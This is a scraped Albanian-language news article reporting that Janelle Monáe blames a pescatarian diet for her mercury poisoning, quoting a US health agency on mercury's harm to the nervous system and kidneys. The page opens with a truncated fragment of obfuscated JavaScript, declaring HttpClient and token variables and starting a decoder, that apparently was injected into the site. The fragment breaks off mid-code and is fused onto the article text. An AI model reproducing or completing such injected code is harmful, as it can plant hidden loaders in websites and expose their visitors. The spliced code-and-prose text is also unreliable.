;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtarja e famshme thotë se kjo dietë i shkaktoi helmim nga merkuri

By

Këngëtarja shumë e famshmë, Janelle Monáe ka folur rreth asaj se si përpiqet të jetojë një mënyrë jetese të shëndetshme, përfshirë dietën e saj.

Tani ajo thotë se të qenit peskatariane e sëmuri atë.

Në një intervistë për The Cut, këngëtarja dhe aktorja zbuloi se ajo po shërohet nga helmimi me merkur të cilin ia atribuoi dietës së saj.

“Fillova të ndieja vdekshmërinë time,” tha Monáe.

Një dietë peskatariane i ngjan një diete vegjetariane ndërsa lejon konsumin e peshkut dhe ushqimeve të detit.

Sipas Agjencisë për Regjistrin e Substancave Toksike dhe Sëmundjeve, e cila është një agjenci federale e shëndetit publik të Departamentit Amerikan të Shëndetit dhe Shërbimeve Njerëzore, “Disa njerëz mund të jenë të ekspozuar ndaj niveleve më të larta të merkurit në këtë formë nëse ata kanë një dietë të lartë në peshk, butakë ose gjitarë detarë. ”

“Sistemi nervor është shumë i ndjeshëm ndaj merkurit. Dëmtimi i përhershëm në tru është treguar se ndodh nga ekspozimi në nivele mjaft të larta të merkurit metalik”, thuhet në faqe. “Veshkat janë gjithashtu të ndjeshme ndaj efekteve të merkurit, sepse merkuri grumbullohet në veshkat dhe shkakton ekspozime më të mëdha në këto inde, dhe kështu më shumë dëme”.

Në një intervistë të vitit 2013 me revistën Glamour Moná atribuoi lëkurën e saj të bukur pjesërisht “dietës së saj vërtet të shkëlqyeshme, me shumë perime dhe peshk.

Image result for janelle monae

Burimi: CNN

Artikuj të ngjashëm